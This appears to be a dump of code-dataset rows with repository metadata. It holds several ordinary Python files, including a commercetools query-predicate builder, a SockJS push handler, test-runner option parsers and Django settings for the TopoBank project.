"MIT"
] | null | null | null | src/commercetools/predicates.py | mikedingjan/commercetools-python-sdk | 95caec9e72017114c4536e63e19f5283754a3871 | [
"MIT"
] | null | null | null | import json
import typing
from collections.abc import Collection
from decimal import Decimal
from functools import reduce
class QueryPredicate:
AND = "AND"
OR = "OR"
_operators = {
"exact": "=",
"gte": ">=",
"lte": "=<",
"lt": "<",
"gt": ">",
"is_defined": ("is defined", "is not defined"),
"contains_all": "contains all",
"contains_any": "contains any",
}
def __init__(self, **filters: str):
self._connector = filters.pop("_connector", self.AND)
self._filters = filters
def __str__(self) -> str:
result = []
for key, value in self._filters.items():
fields = key.split("__")
operator = fields.pop()
if operator not in self._operators:
fields.append(operator)
operator = "exact"
lhs = fields.pop()
val = self._clause(lhs, operator, value)
fields.append(val)
result.append(reduce(lambda x, y: f"{y}({x})", fields[::-1]))
if self._connector == self.OR:
return " OR ".join(result)
return " AND ".join(result)
def __or__(self, other):
data: typing.Dict[str, typing.Any] = {}
data.update(self._filters)
data.update(other._filters)
return self.__class__(**data, _connector=self.OR)
def __and__(self, other):
data: typing.Dict[str, typing.Any] = {}
data.update(self._filters)
data.update(other._filters)
return self.__class__(**data, _connector=self.AND)
def _clause(self, lhs, operator, rhs) -> str:
assert operator in self._operators
if isinstance(rhs, dict):
rhs = self.__class__(**rhs)
return "%s(%s)" % (lhs, rhs)
if isinstance(rhs, self.__class__):
return "%s(%s)" % (lhs, rhs)
op = self._operators[operator]
if isinstance(op, tuple):
return "%s %s" % (lhs, op[0 if rhs else 1])
else:
rhs = self._escape_value(rhs)
return "%s %s %s" % (lhs, op, rhs)
def _escape_value(self, value) -> str:
if isinstance(value, self.__class__):
return "(%s)" % value
if isinstance(value, Decimal):
return str(value)
if not isinstance(value, str) and isinstance(value, Collection):
return "(%s)" % (", ".join(self._escape_value(v) for v in value))
return json.dumps(value)
| 30.108434 | 77 | 0.545818 | 2,374 | 0.94998 | 0 | 0 | 0 | 0 | 0 | 0 | 243 | 0.097239 |
eab4407d8abd439bb29cb8a4260e5cef11df39d1 | 385 | py | Python | accounts/views.py | DipeshYogi/PetsProj | 74ad9cdb1ee959ac81088ced405de52f7d1bc458 | [
"MIT"
] | null | null | null | accounts/views.py | DipeshYogi/PetsProj | 74ad9cdb1ee959ac81088ced405de52f7d1bc458 | [
"MIT"
] | 2 | 2020-06-06T01:28:29.000Z | 2021-06-10T22:39:27.000Z | accounts/views.py | DipeshYogi/PetsProj | 74ad9cdb1ee959ac81088ced405de52f7d1bc458 | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from .forms import UserRegisterForm
def register(request):
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
form.save()
return redirect('login')
else:
form = UserRegisterForm()
return render(request,'accounts/register.html',{'form':form})
| 27.5 | 65 | 0.649351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 43 | 0.111688 |
eab5148279ba7dcb7d46e93c0bb4d1ab9fdcb0d8 | 3,155 | py | Python | thunderpush/handler.py | welingtonsampaio/thunderpush | 9c3fd4bd0c9015cae6d0ad2b3f022680f7c8f4d1 | [
"BSD-3-Clause"
] | null | null | null | thunderpush/handler.py | welingtonsampaio/thunderpush | 9c3fd4bd0c9015cae6d0ad2b3f022680f7c8f4d1 | [
"BSD-3-Clause"
] | null | null | null | thunderpush/handler.py | welingtonsampaio/thunderpush | 9c3fd4bd0c9015cae6d0ad2b3f022680f7c8f4d1 | [
"BSD-3-Clause"
] | null | null | null | import logging
from sockjs.tornado import SockJSConnection
from thunderpush.sortingstation import SortingStation
try:
import simplejson as json
except ImportError:
import json
logger = logging.getLogger()
class ThunderSocketHandler(SockJSConnection):
def on_open(self, info):
logger.debug("New connection opened.")
# no messenger object yet, client needs issue CONNECT command first
self.messenger = None
def on_message(self, msg):
logger.debug("Got message: %s" % msg)
self.process_message(msg)
def on_close(self):
if self.connected:
self.messenger.unregister_user(self)
self.messenger = None
logger.debug("User %s has disconnected."
% getattr(self, "userid", None))
def force_disconnect(self):
self.close(9002, "Server closed the connection (intentionally).")
def process_message(self, msg):
"""
We assume that every client message comes in following format:
COMMAND argument1[:argument2[:argumentX]]
"""
tokens = msg.split(" ")
messages = {
'CONNECT': self.handle_connect,
'SUBSCRIBE': self.handle_subscribe,
'UNSUBSCRIBE': self.handle_unsubscribe
}
try:
messages[tokens[0]](tokens[1])
except (KeyError, IndexError):
logger.warning("Received invalid message: %s." % msg)
def handle_connect(self, args):
if self.connected:
logger.warning("User already connected.")
return
try:
self.userid, self.apikey = args.split(":")
except ValueError:
logger.warning("Invalid message syntax.")
return
# get singleton instance of SortingStation
ss = SortingStation.instance()
# get and store the messenger object for given apikey
self.messenger = ss.get_messenger_by_apikey(self.apikey)
if self.messenger:
self.messenger.register_user(self)
else:
self.close(9000, "Invalid API key.")
def handle_subscribe(self, args):
if not self.connected:
logger.warning("User not connected.")
# close the connection, the user issues commands in a wrong order
self.close(9001, "Subscribing before connecting.")
return
channels = filter(None, args.split(":"))
for channel in channels:
self.messenger.subscribe_user_to_channel(self, channel)
def handle_unsubscribe(self, args):
if not self.connected:
logger.warning("User not connected.")
# close the connection, the user issues commands in a wrong order
self.close(9001, "Subscribing before connecting.")
return
channels = filter(None, args.split(":"))
for channel in channels:
self.messenger.unsubscribe_user_from_channel(self, channel)
def close(self, code=3000, message="Go away!"):
self.session.close(code, message)
@property
def connected(self):
return bool(self.messenger)
| 28.681818 | 77 | 0.620285 | 2,936 | 0.930586 | 0 | 0 | 70 | 0.022187 | 0 | 0 | 811 | 0.257052 |
eab618833368798afc11263d3fd91477fc371614 | 679 | py | Python | archiv/migrations/0015_auto_20210505_1145.py | acdh-oeaw/mmp | 7ef8f33eafd3a7985328d374130f1cbe31f77df0 | [
"MIT"
] | 2 | 2021-06-02T11:27:54.000Z | 2021-08-25T10:29:04.000Z | archiv/migrations/0015_auto_20210505_1145.py | acdh-oeaw/mmp | 7ef8f33eafd3a7985328d374130f1cbe31f77df0 | [
"MIT"
] | 86 | 2021-01-29T12:31:34.000Z | 2022-03-28T11:41:04.000Z | archiv/migrations/0015_auto_20210505_1145.py | acdh-oeaw/mmp | 7ef8f33eafd3a7985328d374130f1cbe31f77df0 | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-05-05 11:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('archiv', '0014_stelle_ort'),
]
operations = [
migrations.AddField(
model_name='stelle',
name='end_date',
field=models.PositiveSmallIntegerField(blank=True, help_text="e.g. '1234'", null=True, verbose_name='End Date'),
),
migrations.AddField(
model_name='stelle',
name='start_date',
field=models.PositiveSmallIntegerField(blank=True, help_text="e.g. '300'", null=True, verbose_name='Start Date'),
),
]
| 28.291667 | 125 | 0.606775 | 588 | 0.865979 | 0 | 0 | 0 | 0 | 0 | 0 | 155 | 0.228277 |
eab67e58469eeb940c1776731bcb51f3cbae8706 | 494 | py | Python | 65-Spam-filter/main.py | PawelZabinski/ocr-code-challenges-files | 24d30de694a00f2190790003778c6d65b8b2554b | [
"MIT"
] | null | null | null | 65-Spam-filter/main.py | PawelZabinski/ocr-code-challenges-files | 24d30de694a00f2190790003778c6d65b8b2554b | [
"MIT"
] | null | null | null | 65-Spam-filter/main.py | PawelZabinski/ocr-code-challenges-files | 24d30de694a00f2190790003778c6d65b8b2554b | [
"MIT"
] | null | null | null | # Spam filter
# Take a list of dishes from a menu and add “spam” to them. See https://en.wikipedia.org/wiki/Spam_(Monty_Python).
def main():
try:
dishCount = int(input('Enter number of dishes in menu > '))
dishes = [input(f'Enter Dish No.{i + 1} > ') for i in range(dishCount)]
dishes = [f'{dish} spam' for dish in dishes]
for dish in dishes:
print(dish)
except:
print('Invalid dish count. Please enter a positive integer')
if __name__ == '__main__':
main() | 27.444444 | 114 | 0.651822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 270 | 0.542169 |
eab815b0041d2f5d41622dd307fbbd7d3b47885d | 6,816 | py | Python | app/cli.py | Jiyvn/pyautotest | a33281d0a6f6edd9c9c60c1e83e2534436818146 | [
"Apache-2.0"
] | null | null | null | app/cli.py | Jiyvn/pyautotest | a33281d0a6f6edd9c9c60c1e83e2534436818146 | [
"Apache-2.0"
] | null | null | null | app/cli.py | Jiyvn/pyautotest | a33281d0a6f6edd9c9c60c1e83e2534436818146 | [
"Apache-2.0"
] | null | null | null | import argparse
class appOptions:
show_devices = '--show-devices'
clean_report = '--clean-report'
device_config = '--device-config'
global_config = '--global-config'
test_case = '--test-case'
tests_dir = '--tests-dir'
device = '--device'
test = '--test'
service_address = '--service-address'
bp = '--bp'
disable_screenshot = '--disable-screenshot'
output_dir = '--output-dir'
separate = '--separate'
allure_report = '--allure-report'
clean = '--clean'
log_level = '--pyauto-log-level'
# log_file = '--pyauto-log-file'
class Parser(object):
def __init__(self, parser=None, attach=True):
self.options = None
self.parser = parser or argparse.ArgumentParser()
if attach:
self.addoption()
def addoption(self):
self.add_help_option()
# 配置文件
self.add_config_option()
# 测试设备
self.add_device_option()
# 测试模块
self.add_tests_option()
# log配置
self.add_log_option()
# output
self.add_output_option()
# appium
self.add_appium_option()
# testing
self.add_testing_option()
def parse_arg(self, op=None):
self.options = self.parser.parse_args(op)
return self.options
def parse_known_args(self, op):
return self.parser.parse_known_args(op)
def add_config_option(self):
# 配置文件
self.parser.add_argument(
appOptions.device_config,
type=str,
help='device configuration file'
)
self.parser.add_argument(
appOptions.global_config,
type=str,
help='global configuration file'
)
self.parser.add_argument(
appOptions.test_case,
type=str,
help='Test case file'
)
def add_device_option(self):
# 运行设备:设备名,输入ios/android会选择默认的ios/android设备,未输入会选择default设备
self.parser.add_argument(
appOptions.device,
type=str,
help='device to test on, such as ios, android, <device>'
)
def add_tests_option(self):
# 运行case(模块): ios/android/...
self.parser.add_argument(
appOptions.test,
nargs='*',
help='Test case to run, such as: ios, android, <dir>/<test_case.py>'
)
self.parser.add_argument(
appOptions.tests_dir,
type=str,
help='Test case to run, such as: ios, android, <dir>/<test_case.py>'
)
def add_testing_option(self):
self.parser.add_argument(
appOptions.disable_screenshot,
action='store_true',
help='Disable device screenshot',
)
def add_log_option(self):
# log 配置
self.parser.add_argument(
appOptions.log_level,
type=str,
help='pyautotest log level',
)
def add_output_option(self):
# report
self.parser.add_argument(
appOptions.output_dir,
type=str,
help='test report directory'
)
self.parser.add_argument(
appOptions.separate,
action='store_true',
help='separate report directory each run',
)
self.parser.add_argument(
appOptions.allure_report,
action='store_true',
help='generate allure report',
)
self.parser.add_argument(
appOptions.clean,
action='store_true',
help='--clean for allure report command',
)
def add_appium_option(self):
# appium
self.parser.add_argument(
appOptions.service_address,
type=str,
help='Appium service address'
)
self.parser.add_argument(
appOptions.bp,
type=str,
help='WebDriverAgent port or Bootstrap port'
)
def add_help_option(self):
self.parser.add_argument(
appOptions.show_devices,
action='store_true',
help='show available devices in device.yml',
)
self.parser.add_argument(
appOptions.clean_report,
action='store_true',
help='clean reports, excluding logs',
)
class pytestOption(object):
def __init__(self, parser):
self.parser = parser
def add_config_option(self):
# 配置文件
self.parser.addoption(
'--device-config',
type=str,
help='device configuration file'
)
self.parser.addoption(
'--global-config',
type=str,
help='global configuration file'
)
self.parser.addoption(
'--test-case',
type=str,
help='Test case file'
)
self.parser.addoption(
'--data',
type=str,
help='Data file'
)
def add_device_option(self):
# 运行设备:设备名,输入ios/android会选择默认的ios/android设备,未输入会选择default设备
self.parser.addoption(
'--device',
type=str,
help='device to test on, such as ios, android, <device>'
)
self.parser.addoption(
'--system-port',
type=str,
help='android desired capabilities - systemPort'
)
self.parser.addoption(
'--platform',
type=str,
help='testing device platform, such as ios/android'
)
def add_case_option(self):
# 运行case(模块): ios/android/bunny/...
self.parser.addoption(
'--test',
type=str,
help='Test case to run, such as: ios, android, <test_case.py>'
)
def add_log_option(self):
# log 配置
self.parser.addoption(
'--pyauto-log-file',
type=str,
help='pyautotest log level',
)
def add_output_option(self):
# report
self.parser.addoption(
'--output-dir',
type=str,
help='output directory'
)
def add_appium_option(self):
# appium
self.parser.addoption(
'--service-address',
type=str,
help='Appium server host'
)
self.parser.addoption(
'--port',
type=str,
help='Appium server host'
)
self.parser.addoption(
'--bp',
type=str,
help='WebDriverAgent Port or Bootstrap Port'
)
def add_attachment_option(self):
self.parser.addoption(
'--disable-screenshot',
action='store_true',
help='Disable screenshot',
) | 26.215385 | 80 | 0.534331 | 6,980 | 0.996573 | 0 | 0 | 0 | 0 | 0 | 0 | 1,979 | 0.282553 |
eab872d17f230c44c3455fbabfcd5cf55ac7a43f | 20,596 | py | Python | config/settings/base.py | ComputationalMechanics/TopoBank | 3e598d4b98cbffa43764e335f026efcbe7580c8a | [
"MIT"
] | 1 | 2020-06-04T23:18:53.000Z | 2020-06-04T23:18:53.000Z | config/settings/base.py | ComputationalMechanics/TopoBank | 3e598d4b98cbffa43764e335f026efcbe7580c8a | [
"MIT"
] | 168 | 2020-06-02T14:46:45.000Z | 2021-03-19T12:11:07.000Z | config/settings/base.py | ComputationalMechanics/TopoBank | 3e598d4b98cbffa43764e335f026efcbe7580c8a | [
"MIT"
] | null | null | null | """
Base settings to build other settings files upon.
"""
import environ
import topobank
ROOT_DIR = environ.Path(__file__) - 3 # (topobank/config/settings/base.py - 3 = topobank/)
APPS_DIR = ROOT_DIR.path('topobank')
env = environ.Env()
READ_DOT_ENV_FILE = env.bool('DJANGO_READ_DOT_ENV_FILE', default=False)
if READ_DOT_ENV_FILE:
# OS environment variables take precedence over variables from .env
env.read_env(str(ROOT_DIR.path('.env')))
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool('DJANGO_DEBUG', False)
# Local time zone. Choices are
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# though not all of them may be available with every OS.
# In Windows, this must be set to your system time zone.
TIME_ZONE = 'Europe/Berlin'
# https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# DATABASES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': env.db('DATABASE_URL', default='postgres:///topobank'),
# 'default': env.db('DATABASE_URL', default='sqlite:///topobank.db'),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# URLS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf
ROOT_URLCONF = 'config.urls'
# https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# APPS
# ------------------------------------------------------------------------------
DJANGO_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'whitenoise.runserver_nostatic', # also use whitenoise with runserver
'django.contrib.staticfiles',
# 'django.contrib.humanize', # Handy template tags
'django.contrib.admin',
'django.contrib.postgres', # needed for 'search' lookup
]
THIRD_PARTY_APPS = [
'crispy_forms',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.orcid',
'rest_framework',
'fontawesomefree',
'formtools',
'bokeh',
'termsandconditions',
'storages',
'guardian',
'bootstrap_datepicker_plus', # for datepicker, see https://github.com/monim67/django-bootstrap-datepicker-plus
'django_select2',
'django_tables2',
'progressbarupload',
'celery_progress',
'notifications',
'django_filters',
'tagulous',
'trackstats',
'fullurl',
]
LOCAL_APPS = [
'topobank.users.apps.UsersAppConfig',
# Your stuff: custom apps go here
'topobank.manager.apps.ManagerAppConfig',
'topobank.analysis.apps.AnalysisAppConfig',
'topobank.usage_stats.apps.UsageStatsAppConfig',
'topobank.tabnav.apps.TabNavAppConfig',
'topobank.publication.apps.PublicationAppConfig',
]
# https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIGRATIONS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#migration-modules
MIGRATION_MODULES = {
'sites': 'topobank.contrib.sites.migrations'
}
# AUTO-CREATED PRIMARY KEYS
# ------------------------------------------------------------------------------
# New in Django 3.2.
# See: https://docs.djangoproject.com/en/3.2/releases/3.2/#customizing-type-of-auto-created-primary-keys
DEFAULT_AUTO_FIELD = 'django.db.models.AutoField'
# AUTHENTICATION
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#authentication-backends
AUTHENTICATION_BACKENDS = [
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
'guardian.backends.ObjectPermissionBackend',
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-user-model
AUTH_USER_MODEL = 'users.User'
# https://docs.djangoproject.com/en/dev/ref/settings/#login-redirect-url
LOGIN_REDIRECT_URL = 'home'
# https://docs.djangoproject.com/en/dev/ref/settings/#login-url
LOGIN_URL = 'account_login'
# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
PASSWORD_HASHERS = [
# https://docs.djangoproject.com/en/dev/topics/auth/passwords/#using-argon2-with-django
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# MIDDLEWARE
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#middleware
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware', # http://whitenoise.evans.io/en/latest/django.html#enable-whitenoise
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
# Enable the following if you want to check T&C by middleware
# this must be called before anonymous user replacement, otherwise anonymous users will
# always be asked to accept terms and conditons
'termsandconditions.middleware.TermsAndConditionsRedirectMiddleware',
'topobank.middleware.anonymous_user_middleware', # we need guardian's kind of anonymous user for API calls
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'topobank.usage_stats.middleware.count_request_middleware',
]
# STATIC
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = [
str(APPS_DIR.path('static')),
]
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# STATICFILES_STORAGE = 'whitenoise.storage.ManifestStaticFilesStorage'
# test whether slow collect static comes from WhiteNoise
# MEDIA
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(ROOT_DIR.path('media'))
# https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'topobank.context_processors.versions_processor',
'topobank.context_processors.basket_processor',
'topobank.tabnav.context_processors.fixed_tabs_processor',
],
},
},
]
# http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap4'
# FIXTURES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#fixture-dirs
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL.
ADMIN_URL = 'admin/'
# https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = [
("""Michael Röttger""", 'roettger@tf.uni-freiburg.de'),
("""Lars Pastewka""", 'lars.pastewka@imtek.uni-freiburg.de')
]
# https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# Celery
# ------------------------------------------------------------------------------
INSTALLED_APPS += ['topobank.taskapp.celery.CeleryAppConfig']
if USE_TZ:
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-timezone
CELERY_TIMEZONE = TIME_ZONE
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-broker_url
CELERY_BROKER_URL = env('CELERY_BROKER_URL', default='amqp://')
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-result_backend
CELERY_RESULT_BACKEND = env('CELERY_RESULT_BACKEND', default='cache+memcached://127.0.0.1:11211/') # CELERY_BROKER_URL
# we don't use rpc:// as default here, because Python 3.7 is not officially supported by celery 4.2
# and there is a problem with Python 3.7's keyword 'async' which is used in the celery code
CELERY_RESULT_PERSISTENT = True
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-accept_content
CELERY_ACCEPT_CONTENT = ['json']
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-task_serializer
CELERY_TASK_SERIALIZER = 'json'
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-result_serializer
CELERY_RESULT_SERIALIZER = 'json'
# TODO: set to whatever value is adequate in your circumstances
CELERYD_TASK_TIME_LIMIT = 5 * 60
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-soft-time-limit
# TODO: set to whatever value is adequate in your circumstances
CELERYD_TASK_SOFT_TIME_LIMIT = 60
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-broker_url
# CELERY_BROKER_URL = env('CELERY_BROKER_URL', default='django://')
# CELERY_BROKER_URL = 'amqp://guest:guest@localhost:5672//'
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-result_backend
# if CELERY_BROKER_URL == 'django://':
# CELERY_RESULT_BACKEND = 'redis://'
# else:
# CELERY_RESULT_BACKEND = CELERY_BROKER_URL
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-accept_content
# CELERY_ACCEPT_CONTENT = ['json', 'pickle']
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-task_serializer
# CELERY_TASK_SERIALIZER = 'pickle'
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-result_serializer
# CELERY_RESULT_SERIALIZER = 'pickle' # because of arrays
# django-allauth
# ------------------------------------------------------------------------------
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_ALLOW_REGISTRATION = env.bool('DJANGO_ACCOUNT_ALLOW_REGISTRATION', True)
# https://django-allauth.readthedocs.io/en/latest/advanced.html?highlight=name#custom-user-models
ACCOUNT_EMAIL_REQUIRED = False
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_USERNAME_REQUIRED = False
# we keep the username field for now, because it is used in the "users" app
# ACCOUNT_USER_MODEL_USERNAME_FIELD = None
ACCOUNT_FORMS = {'signup': 'topobank.users.forms.SignupFormWithName'}
# https://django-allauth.readthedocs.io/en/latest/configuration.html
# ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_EMAIL_VERIFICATION = 'none'
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_ADAPTER = 'topobank.users.adapters.AccountAdapter'
# https://django-allauth.readthedocs.io/en/latest/configuration.html
SOCIALACCOUNT_ADAPTER = 'topobank.users.adapters.SocialAccountAdapter'
ACCOUNT_LOGOUT_ON_GET = True # True: disable intermediate page
# Your stuff...
# ------------------------------------------------------------------------------
#
# Local references for "select2"
#
# An alternative is maybe "django-bower" which could be used
# to resolve all external javascript dependencies and install them
# locally in a defined way
SELECT2_JS = '/static/tagulous/lib/select2-4/js/select2.min.js'
SELECT2_CSS = '/static/tagulous/lib/select2-4/css/select2.min.css'
SELECT2_I18N_PATH = '/static/tagulous/lib/select2-4/js/i18n'
# The default for all these are pointers to Cloudflare CDN
#
# Define permissions when using the rest framework
#
# Make sure that no one can retrieve data from other users, e.g. in view. See GH 168.
# This may help: https://www.django-rest-framework.org/api-guide/permissions/
# This seems to fit well: https://www.django-rest-framework.org/tutorial/4-authentication-and-permissions/
#
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
# 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
#'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
#'PAGE_SIZE': 2,
}
# Version number used in the GUI
TOPOBANK_VERSION = topobank.__version__
#
# Settings for authentication with ORCID
#
SOCIALACCOUNT_PROVIDERS = {
'orcid': {
# Base domain of the API. Default value: 'orcid.org', for the production API
# 'BASE_DOMAIN':'sandbox.orcid.org', # for the sandbox API
# Member API or Public API? Default: False (for the public API)
# 'MEMBER_API': False, # for the member API
}
}
SOCIALACCOUNT_QUERY_EMAIL = True # e-mail should be aquired from social account provider
def ACCOUNT_USER_DISPLAY(user):
return user.name
#
# Settings for handling terms and conditions
#
TERMS_EXCLUDE_URL_LIST = {'/accounts/logout/'}
# TERMS_EXCLUDE_URL_PREFIX_LIST = {'/users/'}
TERMS_EXCLUDE_USERS_WITH_PERM = 'users.can_skip_terms'
TERMS_STORE_IP_ADDRESS = False
#
# Storage Settings
#
USE_S3_STORAGE = env.bool('USE_S3_STORAGE', default=False)
if USE_S3_STORAGE:
# Enable this storage for the S3 backend
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'
# DEFAULT_FILE_STORAGE = 'topobank.manager.storage_backends.MediaStorage'
AWS_LOCATION = env.str('AWS_MEDIA_PREFIX', default='media')
AWS_ACCESS_KEY_ID = env.str('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = env.str('AWS_SECRET_ACCESS_KEY')
AWS_STORAGE_BUCKET_NAME = env.str('AWS_STORAGE_BUCKET_NAME', default='topobank-assets')
AWS_AUTO_CREATE_BUCKET = True
AWS_S3_ENDPOINT_URL = env.str('AWS_S3_ENDPOINT_URL', default='https://localhost:8082/')
AWS_S3_USE_SSL = env.bool('AWS_S3_USE_SSL', default=True)
AWS_S3_VERIFY = env.bool('AWS_S3_VERIFY', default=True)
AWS_DEFAULT_ACL = None
# Append extra characters if new files have the same name
AWS_S3_FILE_OVERWRITE = False
#
# Settings for django-guardian
#
GUARDIAN_MONKEY_PATCH = False
GUARDIAN_RENDER_403 = True
# uses template "403.html" by default
# see https://django-guardian.readthedocs.io/en/stable/configuration.html#guardian-render-403
#
# Settings for django-tables2
#
DJANGO_TABLES2_TEMPLATE = 'django_tables2/bootstrap4.html'
#
# Setting for progress bar during upload
#
# see https://github.com/ouhouhsami/django-progressbarupload
#
FILE_UPLOAD_HANDLERS = (
"progressbarupload.uploadhandler.ProgressBarUploadHandler",
"django.core.files.uploadhandler.MemoryFileUploadHandler",
"django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
PROGRESSBARUPLOAD_INCLUDE_JQUERY = False
#
# Settings for tracking package versions for analyses
#
# list of tuples of form (import_name, expression_returning_version_string)
TRACKED_DEPENDENCIES = [
('SurfaceTopography', 'SurfaceTopography.__version__'),
('ContactMechanics', 'ContactMechanics.__version__'),
('NuMPI', 'NuMPI.__version__'),
('muFFT', 'muFFT.version.description()'),
('topobank', 'topobank.__version__'),
('numpy', 'numpy.__version__'),
('scipy', 'scipy.__version__'),
]
#
# Settings for notifications package
#
DJANGO_NOTIFICATIONS_CONFIG = {'USE_JSONFIELD': True}
